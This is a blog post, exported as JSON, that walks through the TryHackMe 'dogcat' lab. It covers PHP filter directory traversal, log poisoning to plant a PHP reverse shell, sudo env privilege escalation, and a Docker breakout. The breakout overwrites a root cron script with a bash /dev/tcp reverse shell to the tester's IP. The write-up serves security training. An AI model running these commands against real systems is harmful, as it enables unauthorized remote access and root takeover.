{"id":132239,"date":"2023-03-05T17:47:52","date_gmt":"2023-03-05T17:47:52","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1184671"},"modified":"2023-03-05T17:47:52","modified_gmt":"2023-03-05T17:47:52","slug":"tryhackme-dogcat-walkthrough-easy-video","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2023\/03\/05\/tryhackme-dogcat-walkthrough-easy-video\/","title":{"rendered":"TryHackMe DogCat Walkthrough [+ Easy Video]"},"content":{"rendered":"\n<h2>CHALLENGE OVERVIEW<\/h2>\n<figure class=\"wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube\"><a href=\"https:\/\/blog.finxter.com\/tryhackme-dogcat-walkthrough-easy-video\/\"><img decoding=\"async\" src=\"https:\/\/blog.finxter.com\/wp-content\/plugins\/wp-youtube-lyte\/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2F8MYrYIQR-9o%2Fhqdefault.jpg\" alt=\"YouTube Video\"><\/a><figcaption><\/figcaption><\/figure>\n<ul>\n<li><strong>Link<\/strong>: <a href=\"https:\/\/tryhackme.com\/room\/dogcat\" target=\"_blank\" rel=\"noreferrer noopener\">THM Dogcat<\/a><\/li>\n<li><strong>Difficulty<\/strong>: Medium<\/li>\n<li><strong>Target<\/strong>: Flags 1-4<\/li>\n<li><strong>Highlight<\/strong>: intercepting and modifying a web request using <code>burpsuite<\/code><\/li>\n<li><strong>Tools used<\/strong>: <code>base64<\/code>, 
<code>burpsuite<\/code><\/li>\n<li><strong>Tags<\/strong>: <em>docker, directory traversal<\/em><\/li>\n<\/ul>\n<h2>BACKGROUND<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"693\" height=\"459\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-45.png\" alt=\"\" class=\"wp-image-1184695\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-45.png 693w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-45-300x199.png 300w\" sizes=\"auto, (max-width: 693px) 100vw, 693px\" \/><\/figure>\n<\/div>\n<p>In this tutorial, we will walk through a simple website showing pictures of dogs and cats. <\/p>\n<p>We\u2019ll discover a directory traversal vulnerability that we can leverage to view sensitive files on the target machine. <\/p>\n<p>At the end of this challenge, we will break out of a docker container in order to capture the 4th and final flag.<\/p>\n<h2>ENUMERATION\/RECON<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"608\" height=\"855\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-51.png\" alt=\"\" class=\"wp-image-1184710\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-51.png 608w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-51-213x300.png 213w\" sizes=\"auto, (max-width: 608px) 100vw, 608px\" \/><\/figure>\n<\/div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">export target=10.10.148.135\nexport myIP=10.6.2.23\n<\/pre>\n<p>Let\u2019s walk the site. <\/p>\n<p>It looks like a simple image-viewing site that can randomize images of dogs and cats. 
After toying around with the browser addresses, we find that directory traversal allows us to view other files. <\/p>\n<p>Let\u2019s see if we can grab the source code of the page that processes our parameters in the browser address. This will help us understand what is happening on the backend. <\/p>\n<p>We\u2019ll use a simple PHP filter (<code>php:\/\/filter<\/code>) to convert the file contents to <a href=\"https:\/\/blog.finxter.com\/python-base64\/\" data-type=\"post\" data-id=\"327003\" target=\"_blank\" rel=\"noreferrer noopener\">base64<\/a> and output the raw base64 string.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">http:\/\/10.10.148.135\/?view=php:\/\/filter\/read=convert.base64-encode\/resource=.\/dog\/..\/index<\/pre>\n<p>Raw output:<\/p>\n<pre class=\"wp-block-preformatted\"><code>PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKQ [&hellip;]<\/code><\/pre>\n<p>Let\u2019s save this string as a file named \u201c<code>string<\/code>\u201d. 
Then we can use the command \u201c<code>cat string | base64 -d<\/code>\u201d to decode this string and view it as raw source code.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"917\" height=\"604\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-43.png\" alt=\"\" class=\"wp-image-1184687\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-43.png 917w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-43-300x198.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-43-768x506.png 768w\" sizes=\"auto, (max-width: 917px) 100vw, 917px\" \/><\/figure>\n<\/div>\n<p>Reading over this source code, we can see that the file extension can be set! <\/p>\n<p>If the user doesn\u2019t specify the extension, the default will be <code>.php<\/code>. This means that we can add \u201c<code>&amp;ext=<\/code>\u201d to the end of our web address to prevent the <code>.php<\/code> extension from being added. 
<\/p>\n<p>In order for it to properly display our request, we need to include the word \u201cdog\u201d or \u201ccat\u201d in the address.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"942\" height=\"520\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-42.png\" alt=\"\" class=\"wp-image-1184685\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-42.png 942w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-42-300x166.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-42-768x424.png 768w\" sizes=\"auto, (max-width: 942px) 100vw, 942px\" \/><\/figure>\n<\/div>\n<p>Let\u2019s dive in with <code>burpsuite<\/code> and start intercepting and modifying requests.<\/p>\n<p>Here is our order of steps for us to get our initial foothold on the target machine:<\/p>\n<ol>\n<li>Create a PHP reverse shell<\/li>\n<li>Start up our <code>netcat<\/code> listener<\/li>\n<li>Use <code>burp<\/code> to intercept and modify the web request. 
Wait until later to click \u201c<code>forward<\/code>\u201d.<\/li>\n<li>Spin up a <a rel=\"noreferrer noopener\" href=\"https:\/\/blog.finxter.com\/python-one-liner-webserver\/\" data-type=\"post\" data-id=\"8635\" target=\"_blank\">simple HTTP server <\/a>with Python in the same directory as the PHP revshell.<\/li>\n<li>Click \u201c<code>forward<\/code>\u201d on <code>burp<\/code> to send the web request.<\/li>\n<li>Activate the shell by entering: <code>$targetIP\/bshell.php<\/code> in the browser address<\/li>\n<li>Catch the revshell on <code>netcat<\/code>!<\/li>\n<\/ol>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"713\" height=\"826\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-50.png\" alt=\"\" class=\"wp-image-1184709\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-50.png 713w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-50-259x300.png 259w\" sizes=\"auto, (max-width: 713px) 100vw, 713px\" \/><\/figure>\n<\/div>\n<h3>STEP 1<\/h3>\n<p>Let\u2019s create a PHP pentest monkey revshell.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"978\" height=\"628\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-41.png\" alt=\"\" class=\"wp-image-1184683\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-41.png 978w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-41-300x193.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-41-768x493.png 768w\" sizes=\"auto, (max-width: 978px) 100vw, 978px\" \/><\/figure>\n<\/div>\n<h3>STEP 2<\/h3>\n<p>Let\u2019s first start up a <code>netcat<\/code> listener on port 2222.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" 
data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lnvp 2222<\/pre>\n<h3>STEP 3<\/h3>\n<p>Intercept the web request for the Apache2 log and modify the User-Agent field with PHP code that requests the <code>shell.php<\/code> code and saves it as <code>bshell.php<\/code> on the target machine. <\/p>\n<p>This works only because, upon examining the Apache2 logs, we noticed that the User-Agent field is written unencoded and is vulnerable to command injection. Make sure to wait to click forward until step 5.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"942\" height=\"520\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-40.png\" alt=\"\" class=\"wp-image-1184682\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-40.png 942w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-40-300x166.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-40-768x424.png 768w\" sizes=\"auto, (max-width: 942px) 100vw, 942px\" \/><\/figure>\n<\/div>\n<h3>STEP 4<\/h3>\n<p>We\u2019ll spin up a simple Python HTTP server in the same directory as our revshell to serve <code>shell.php<\/code> to our target machine via the modified web request we created in <code>burpsuite<\/code>.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"467\" height=\"123\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-39.png\" alt=\"\" class=\"wp-image-1184681\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-39.png 467w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-39-300x79.png 300w\" sizes=\"auto, (max-width: 467px) 100vw, 467px\" \/><\/figure>\n<\/div>\n<h3>STEP 5<\/h3>\n<p>Click forward on burp and check to see if code 200 came through for 
<code>shell.php<\/code> on the HTTP server.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"465\" height=\"271\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-38.png\" alt=\"\" class=\"wp-image-1184680\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-38.png 465w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-38-300x175.png 300w\" sizes=\"auto, (max-width: 465px) 100vw, 465px\" \/><\/figure>\n<\/div>\n<h3>STEP 6<\/h3>\n<p>We can activate the shell from our browser now and hopefully catch it as a revshell on our netcat listener.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"940\" height=\"175\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-37.png\" alt=\"\" class=\"wp-image-1184679\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-37.png 940w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-37-300x56.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-37-768x143.png 768w\" sizes=\"auto, (max-width: 940px) 100vw, 940px\" \/><\/figure>\n<\/div>\n<h3>STEP 7<\/h3>\n<p>We successfully caught it! 
Now we are in with our initial foothold!<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"458\" height=\"202\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-36.png\" alt=\"\" class=\"wp-image-1184678\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-36.png 458w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-36-300x132.png 300w\" sizes=\"auto, (max-width: 458px) 100vw, 458px\" \/><\/figure>\n<\/div>\n<h2>INITIAL FOOTHOLD<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"688\" height=\"613\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-49.png\" alt=\"\" class=\"wp-image-1184708\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-49.png 688w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-49-300x267.png 300w\" sizes=\"auto, (max-width: 688px) 100vw, 688px\" \/><\/figure>\n<\/div>\n<h3>LOCATE THE FIRST FLAG<\/h3>\n<p>Let\u2019s grab the first flag. 
We can grab it from our browser again in base64, or via the command line from the revshell.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">http:\/\/10.10.148.135\/?view=php:\/\/filter\/read=convert.base64-encode\/resource=.\/dog\/..\/flag\nPD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo\/Pgo=\n<\/pre>\n<p>Now we can decode this string (saved as <code>firstflag.txt<\/code>) with <code>base64<\/code>:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">base64 --decode firstflag.txt\n&lt;?php\n$flag_1 = \"THM{Th\u2014------------omitted\u2014-------fa}\"\n?>\n<\/pre>\n<h2>LOCAL RECON<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"689\" height=\"854\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-48.png\" alt=\"\" class=\"wp-image-1184707\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-48.png 689w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-48-242x300.png 242w\" sizes=\"auto, (max-width: 689px) 100vw, 689px\" \/><\/figure>\n<\/div>\n<h3>LOCATE THE SECOND FLAG<\/h3>\n<p>We manually enumerate the filesystem and discover the second flag at <code>\/var\/www\/flag2_QMW7JvaY2LvK.txt<\/code><\/p>\n<p>Using the <code>find<\/code> command can help us quickly scan the filesystem for any files whose name contains the word \u201cflag\u201d.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" 
data-enlighter-title=\"\" data-enlighter-group=\"\">find \/ -type f -name '*flag*' 2>\/dev\/null<\/pre>\n<p>We found the second flag in plaintext!<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cat flag2_QMW7JvaY2LvK.txt\nTHM{LF\u2014------------omitted\u2014-------fb}\n<\/pre>\n<h3>CHECK SUDO PERMISSIONS<\/h3>\n<p>Let\u2019s check out our sudo permissions with the command:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo -l\nMatching Defaults entries for www-data on 26e23794a52b:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on 26e23794a52b:\n    (root) NOPASSWD: \/usr\/bin\/env\n<\/pre>\n<h2>EXPLOIT\/PRIVILEGE ESCALATION<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"607\" height=\"914\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-47.png\" alt=\"\" class=\"wp-image-1184705\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-47.png 607w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-47-199x300.png 199w\" sizes=\"auto, (max-width: 607px) 100vw, 607px\" \/><\/figure>\n<\/div>\n<p>Because we have sudo permission to run the <code>env<\/code> binary without a password, we can easily become root with the command:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" 
data-enlighter-group=\"\">sudo env \/bin\/bash<\/pre>\n<p>Now we can verify that we are root with the command <code>whoami<\/code>.<\/p>\n<h3>GRAB THE THIRD FLAG<\/h3>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cd \/root\nls\nflag3.txt\ncat flag3.txt\nTHM{D1\u2014------------omitted\u2014-------12}\n<\/pre>\n<h2>POST-EXPLOITATION &#8211; BREAK OUT OF THE DOCKER CONTAINER<\/h2>\n<p>Let\u2019s start up a new listener to catch the new bash shell outside of the container.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lnvp 3333<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"627\" height=\"259\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-35.png\" alt=\"\" class=\"wp-image-1184677\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-35.png 627w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-35-300x124.png 300w\" sizes=\"auto, (max-width: 627px) 100vw, 627px\" \/><\/figure>\n<\/div>\n<p>We notice that there is a <code>backup.sh<\/code> that regularly runs on a schedule via cronjobs. 
We can hijack this file, which is run by root outside of the docker container, by changing its contents to throw a revshell.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">echo \"#!\/bin\/bash\">backup.sh;echo \"bash -i>\/dev\/tcp\/10.6.2.23\/3333 0>&amp;1\">>backup.sh\nflag4.txt\ncat flag4.txt\nTHM{esc\u2014------------omitted\u2014-------2d}\n<\/pre>\n<h2>FINAL THOUGHTS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"614\" height=\"907\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-46.png\" alt=\"\" class=\"wp-image-1184704\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-46.png 614w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/03\/image-46-203x300.png 203w\" sizes=\"auto, (max-width: 614px) 100vw, 614px\" \/><\/figure>\n<\/div>\n<p>This box was a lot of fun. The bulk of the challenge was working towards gaining the initial foothold. <\/p>\n<p>Once we secured a revshell, the rest of the box went pretty quickly. <\/p>\n<p>The final step of breaking out of a docker container with a second revshell was the sneakiest part for me. <\/p>\n<p>The PHP directory traversal and using a PHP filter to encode with base64 was also a cool way to evade the data sanitization measures in place on the backend.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>5\/5 &#8211; (1 vote) CHALLENGE OVERVIEW Link: THM Dogcat Difficulty: Medium Target: Flags 1-4 Highlight: intercepting and modifying a web request using burpsuite&nbsp; Tools used: base64, burpsuite Tags: docker, directory traversal BACKGROUND In this tutorial, we will walk a simple website showing pictures of dogs and cats. 
We\u2019ll discover a directory traversal vulnerability that we [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-132239","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/132239","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=132239"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/132239\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=132239"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=132239"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=132239"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}